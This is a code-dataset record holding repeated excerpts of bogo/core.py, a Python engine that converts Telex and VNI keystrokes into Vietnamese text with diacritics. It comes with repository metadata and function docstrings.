#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | process_sequence | python | def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts) | \
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L114-L150 | [
"def process_key(string, key,\n fallback_sequence=\"\", rules=None,\n skip_non_vietnamese=True):\n \"\"\"Process a keystroke.\n\n Args:\n string: The previously processed string or \"\".\n key: The keystroke.\n fallback_sequence: The previous keystrokes.\n ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | process_key | python | def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result | Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L153-L286 | [
"def join(alist):\n return \"\".join(alist)\n",
"def get_telex_definition(w_shorthand=True, brackets_shorthand=True):\n \"\"\"Create a definition dictionary for the TELEX input method\n\n Args:\n w_shorthand (optional): allow a stand-alone w to be\n interpreted as an ư. Default to True.... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
